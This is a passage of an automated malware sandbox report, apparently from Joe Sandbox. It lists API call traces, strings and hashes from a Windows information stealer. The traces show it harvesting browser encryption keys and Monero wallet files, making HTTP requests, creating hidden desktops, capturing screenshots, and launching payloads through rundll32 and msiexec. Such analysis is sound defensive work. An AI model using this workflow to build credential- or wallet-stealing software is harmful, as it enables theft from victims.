StrStrA.SHLWAPI(?,00A714D0,00000000,?,00421550,00000000,?,00000000,00000000,?,00A6DC90,00000000,?,0042154C,00000000,?), ref: 0040CDA2
StrStrA.SHLWAPI(00000000,00A71510), ref: 0040CDB9

Part of subcall function 0040C920: memset.MSVCRT ref: 0040C953
Part of subcall function 0040C920: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00A6DBB0), ref: 0040C971
Part of subcall function 0040C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
Part of subcall function 0040C920: memcpy.MSVCRT(?,?,?), ref: 0040CA12

StrStrA.SHLWAPI(?,00A71510,00000000,?,00421554,00000000,?,00000000,00A6DBB0), ref: 0040CE5A
StrStrA.SHLWAPI(00000000,00A6DE10), ref: 0040CE71

Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78

lstrlenA.KERNEL32(00000000), ref: 0040CF44
CloseHandle.KERNEL32(00000000), ref: 0040CF9C

Strings

, xrefs: 0040CAC6

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
String ID:
API String ID: 1564132460-3916222277
Opcode ID: 319ad7b4aa2611097864e6b9fb105a892de663381b2c54de453d8c226baa0bf7
Instruction ID: 4fdc336044367871c69213567fe42fce90f61d04e08d5fff212e48b059342ccf
Opcode Fuzzy Hash: 319ad7b4aa2611097864e6b9fb105a892de663381b2c54de453d8c226baa0bf7
Instruction Fuzzy Hash: 2AE13E71D05108ABCB14EBA1DCA6FEEB779AF14304F00419EF10663191EF387A99CB69

Function 023FCCF7 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9

Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C

Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,006D703C,00000000,?,00421544,00000000,?,?), ref: 023FCDD3
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 023FCDF0
GetFileSize.KERNEL32(00000000,00000000), ref: 023FCDFC
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 023FCE0F
??_U@YAPAXI@Z.MSVCRT(-00000001), ref: 023FCE1C
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 023FCE40
StrStrA.SHLWAPI(?,006D6BB0,00420B56), ref: 023FCE5E
StrStrA.SHLWAPI(00000000,006D6D64), ref: 023FCE85
StrStrA.SHLWAPI(?,006D6ED0,00000000,?,00421550,00000000,?,00000000,00000000,?,006D6B5C,00000000,?,0042154C,00000000,?), ref: 023FD009
StrStrA.SHLWAPI(00000000,006D6ECC), ref: 023FD020

Part of subcall function 023FCB87: memset.MSVCRT ref: 023FCBBA
Part of subcall function 023FCB87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 023FCBD8
Part of subcall function 023FCB87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 023FCBE3
Part of subcall function 023FCB87: memcpy.MSVCRT(?,?,?), ref: 023FCC79

StrStrA.SHLWAPI(?,006D6ECC,00000000,?,00421554,00000000,?,00000000,006D6ADC), ref: 023FD0C1
StrStrA.SHLWAPI(00000000,006D6FA8), ref: 023FD0D8

Part of subcall function 023FCB87: lstrcat.KERNEL32(?,00420B47), ref: 023FCCAA
Part of subcall function 023FCB87: lstrcat.KERNEL32(?,00420B4B), ref: 023FCCBE
Part of subcall function 023FCB87: lstrcat.KERNEL32(?,00420B4E), ref: 023FCCDF

lstrlen.KERNEL32(00000000), ref: 023FD1AB
CloseHandle.KERNEL32(00000000), ref: 023FD203

Strings

, xrefs: 023FCD2D

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
String ID:
API String ID: 1564132460-3916222277
Opcode ID: 855bc2773a8edbe2702640e8442d81e0a176fb990623bce130120e5cf956bf83
Instruction ID: 28eb7b18c92e8ed7297033b4dd627bacb0cc9ca9f9ccbe0661e9b14651a59e7a
Opcode Fuzzy Hash: 855bc2773a8edbe2702640e8442d81e0a176fb990623bce130120e5cf956bf83
Instruction Fuzzy Hash: FEE1F171D40228ABCB15EBA5DC94FEEB77AAF54704F40416EF246661D0EF306A89CF50

Function 023FA097 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 157stringsleepprocessCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 023FA0AE

Part of subcall function 02408F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,023F1660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 02408F7D

wsprintfA.USER32 ref: 023FA0E6
OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 023FA10A
CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 023FA133
memset.MSVCRT ref: 023FA154
lstrcat.KERNEL32(00000000,?), ref: 023FA16A
lstrcat.KERNEL32(00000000,?), ref: 023FA17E
lstrcat.KERNEL32(00000000,004212D8), ref: 023FA190
memset.MSVCRT ref: 023FA1A4
lstrcpy.KERNEL32(?,00000000), ref: 023FA1E3
memset.MSVCRT ref: 023FA203
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 023FA26B
Sleep.KERNEL32(00001388), ref: 023FA27A
CloseDesktop.USER32(00000000), ref: 023FA2C7

Strings

D, xrefs: 023FA20B

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: memset$Desktoplstrcat$Create$CloseOpenProcessSleepSystemTimelstrcpywsprintf
String ID: D
API String ID: 1347862506-2746444292
Opcode ID: 129a72e408785f324dac0317533ad1fd853fd10515b731b54cc373586fca86ea
Instruction ID: efaceb02cb6923c0f97202a323295747fe5d60bc1b7eecec2be0d569b3558b50
Opcode Fuzzy Hash: 129a72e408785f324dac0317533ad1fd853fd10515b731b54cc373586fca86ea
Instruction Fuzzy Hash: F7516FB1D04318ABDB24DB60DC89FD97779AF48700F0045A9F60DAA2D0EB759B88CF55

Function 004184B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

RegOpenKeyExA.ADVAPI32(00000000,00A6E360,00000000,00020019,00000000,004205BE), ref: 00418534
RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
wsprintfA.USER32 ref: 004185E9
RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041860B
RegCloseKey.ADVAPI32(00000000), ref: 0041861C
RegCloseKey.ADVAPI32(00000000), ref: 00418629

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Strings

- , xrefs: 00418733
?, xrefs: 0041850A
%s\%s, xrefs: 004185DD

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 93c83181ebae43ba24f8ba122f93400849cec83954c63ab8cf28178e69971814
Instruction ID: c228fa157c9b2873a9233ab8a396ad333d8a8ae6667b392d6015aff843962e7d
Opcode Fuzzy Hash: 93c83181ebae43ba24f8ba122f93400849cec83954c63ab8cf28178e69971814
Instruction Fuzzy Hash: 47812D71911118ABDB24DB50DD95FEAB7B9BF08314F1082DEE10966180DF746BC8CFA9

Function 004191A0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004191FC

Strings

`dAF, xrefs: 00419361, 004193D9, 0041930E, 004192DF, 004192B2, 0041920D, 004191E4, 00419364
`dAF, xrefs: 004191CF, 00419399, 004191D2, 0041939C
image/jpeg, xrefs: 004192C6

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: `dAF$`dAF$image/jpeg
API String ID: 2244384528-2462684518
Opcode ID: babf49ba20920563954b4310973f8f88ddc30fd05da4e819fe27d77726b3164b
Instruction ID: 5957f6d1424668cbfb95915d93d24f68315a2265fb4ab52f55d04562dbc5d918
Opcode Fuzzy Hash: babf49ba20920563954b4310973f8f88ddc30fd05da4e819fe27d77726b3164b
Instruction Fuzzy Hash: BE710E71E11208ABDB14EFE4DC95FEEB779BF48300F10851AF516A7290EB34A944CB65

Function 00415510 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 138stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,00A72600), ref: 00406353
Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,00A72080,00000000,00000000,00400100,00000000), ref: 004063D5
Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
lstrlenA.KERNEL32(00000000), ref: 0041557F

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
lstrlenA.KERNEL32(00000000), ref: 004155D3
strtok.MSVCRT(00000000,?), ref: 004155EE
lstrlenA.KERNEL32(00000000), ref: 004155FE

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Strings

lXA, xrefs: 0041570E, 004156D4, 00415697, 0041565A, 0041561E
ERROR, xrefs: 00415609
ERROR, xrefs: 004156F9
ERROR, xrefs: 00415682
ERROR, xrefs: 004156BF
ERROR, xrefs: 0041555A

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$lXA
API String ID: 3532888709-2643084821
Opcode ID: 904f5d64da91e06ead0d936d340dde400ebc5da841b4e9b86dfd7fc02f15ceb4
Instruction ID: 990a636b304bf614e487c778196146b6daa8d27d3f5f6fae7c13381180e093e6
Opcode Fuzzy Hash: 904f5d64da91e06ead0d936d340dde400ebc5da841b4e9b86dfd7fc02f15ceb4
Instruction Fuzzy Hash: B7518030A11148EBCB14FF61DDA6AED7339AF10354F50442EF50A671A1EF386B94CB5A

Function 00411520 Relevance: 19.8, APIs: 13, Instructions: 308stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00411557
strtok_s.MSVCRT ref: 004119A0

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,00A6DD90,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 06649906eb56a75e707e76c73bf3ad7756cc6685bc2ad0a2cf06ec6a6bcab578
Instruction ID: 972b35e280e46cb9f8f2efccef7ae82ad5cc4b0fb079cf0b80f28d4141883f35
Opcode Fuzzy Hash: 06649906eb56a75e707e76c73bf3ad7756cc6685bc2ad0a2cf06ec6a6bcab578
Instruction Fuzzy Hash: 98C1D1B5A011089BCB14EF60DC99FDA7379AF58308F00449EF509A7282EB34EAD5CF95

Function 00413080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

ShellExecuteEx.SHELL32(0000003C), ref: 00413415
ShellExecuteEx.SHELL32(0000003C), ref: 004135AD
ShellExecuteEx.SHELL32(0000003C), ref: 0041373A

Strings

C:\Windows\system32\rundll32.exe, xrefs: 00413582
/passive, xrefs: 004136AB
C:\Windows\system32\msiexec.exe, xrefs: 0041370F
.dll, xrefs: 00413435
"" , xrefs: 004132EA
<, xrefs: 004136E0
.msi, xrefs: 004135E8
/i ", xrefs: 00413634

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: 26c152d7f96a75462af708fb0be05a9bf32e82651be1c71a9be3783b36db2b02
Instruction ID: 9b621e5b28039e8226f92625bb5802f9f58bb257d03f06fe20f9cf3dfd15236c
Opcode Fuzzy Hash: 26c152d7f96a75462af708fb0be05a9bf32e82651be1c71a9be3783b36db2b02
Instruction Fuzzy Hash: 271241719011189ACB14FBA1DDA2FEDB739AF14314F00419FF10666196EF382B99CFA9

Function 004144D0 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004144EE
memset.MSVCRT ref: 00414505

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000), ref: 0041453C
lstrcatA.KERNEL32(?,00A70B98), ref: 0041455B
lstrcatA.KERNEL32(?,?), ref: 0041456F
lstrcatA.KERNEL32(?,00A71048), ref: 00414583

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F

Part of subcall function 0040A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489
Part of subcall function 0040A430: memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Part of subcall function 00419550: GlobalAlloc.KERNEL32(00000000,0041462D,0041462D), ref: 00419563

StrStrA.SHLWAPI(?,00A72008), ref: 00414643
GlobalFree.KERNEL32(?), ref: 00414762

Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F

Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D

lstrcatA.KERNEL32(?,00000000), ref: 004146F3
StrCmpCA.SHLWAPI(?,004208D2), ref: 00414710
lstrcatA.KERNEL32(00000000,00000000), ref: 00414722
lstrcatA.KERNEL32(00000000,?), ref: 00414735
lstrcatA.KERNEL32(00000000,00420FA0), ref: 00414744

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 1191620704-0
Opcode ID: 56b0e3791313187faecf28fb1c308eeb638c5f4e19ec101d569dba3e0703b254
Instruction ID: a18e5ba717d90c20c2426d83a13a237c0a2f648a3df755456e30f39b11c63a78
Opcode Fuzzy Hash: 56b0e3791313187faecf28fb1c308eeb638c5f4e19ec101d569dba3e0703b254
Instruction Fuzzy Hash: B77157B6D00218ABDB14EBA0DD45FDE737AAF88304F00459DF505A6191EB38EB94CF55

Function 02404737 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02404755
memset.MSVCRT ref: 0240476C

Part of subcall function 024091D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02409202

lstrcat.KERNEL32(?,00000000), ref: 024047A3
lstrcat.KERNEL32(?,006D6D0C), ref: 024047C2
lstrcat.KERNEL32(?,?), ref: 024047D6
lstrcat.KERNEL32(?,006D6FD8), ref: 024047EA

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

Part of subcall function 02409187: GetFileAttributesA.KERNEL32(00000000,?,023F1DFB,?,?,00425784,?,?,00420E22), ref: 02409196

Part of subcall function 023FA697: StrStrA.SHLWAPI(00000000,00421360), ref: 023FA6F0
Part of subcall function 023FA697: memcmp.MSVCRT(?,00421244,00000005), ref: 023FA749

Part of subcall function 023FA377: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 023FA3A3
Part of subcall function 023FA377: GetFileSizeEx.KERNEL32(000000FF,?), ref: 023FA3C8
Part of subcall function 023FA377: LocalAlloc.KERNEL32(00000040,?), ref: 023FA3E8
Part of subcall function 023FA377: ReadFile.KERNEL32(000000FF,?,00000000,023F16F6,00000000), ref: 023FA411
Part of subcall function 023FA377: LocalFree.KERNEL32(023F16F6), ref: 023FA447
Part of subcall function 023FA377: CloseHandle.KERNEL32(000000FF), ref: 023FA451

Part of subcall function 024097B7: GlobalAlloc.KERNEL32(00000000,02404894,02404894), ref: 024097CA

StrStrA.SHLWAPI(?,006D6AD8), ref: 024048AA
GlobalFree.KERNEL32(?), ref: 024049C9

Part of subcall function 023FA477: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,023F51A5,00000000,00000000), ref: 023FA4A6
Part of subcall function 023FA477: LocalAlloc.KERNEL32(00000040,?,?,?,023F51A5,00000000,?), ref: 023FA4B8
Part of subcall function 023FA477: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,023F51A5,00000000,00000000), ref: 023FA4E1
Part of subcall function 023FA477: LocalFree.KERNEL32(?,?,?,?,023F51A5,00000000,?), ref: 023FA4F6

Part of subcall function 023FA7C7: memcmp.MSVCRT(?,0042124C,00000003), ref: 023FA7E4

lstrcat.KERNEL32(?,00000000), ref: 0240495A
StrCmpCA.SHLWAPI(?,004208D2), ref: 02404977
lstrcat.KERNEL32(00000000,00000000), ref: 02404989
lstrcat.KERNEL32(00000000,?), ref: 0240499C
lstrcat.KERNEL32(00000000,00420FA0), ref: 024049AB

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 1191620704-0
Opcode ID: 5e7d088db62709dc0ccde8baf0395fa2f3c858227df9e8cbd07930c03f7cc80d
Instruction ID: 6da35515853408f879d50e4e2d5da6309113e8ca8c90edb3edca693a40bf9995
Opcode Fuzzy Hash: 5e7d088db62709dc0ccde8baf0395fa2f3c858227df9e8cbd07930c03f7cc80d
Instruction Fuzzy Hash: 797136B1D00218ABDB14EBB0DD89FDE777AAF88300F0445A9E60997190EB35DB88CF51

Function 00401310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401327

Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF

lstrcatA.KERNEL32(?,00000000), ref: 0040134F
lstrlenA.KERNEL32(?), ref: 0040135C
lstrcatA.KERNEL32(?,.keys), ref: 00401377

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00A69400,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

DeleteFileA.KERNEL32(00000000), ref: 004014EF
memset.MSVCRT ref: 00401516

Strings

\Monero\wallet.keys, xrefs: 0040138D
SOFTWARE\monero-project\monero-core, xrefs: 00401335
.keys, xrefs: 0040136B
wallet_path, xrefs: 00401330

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
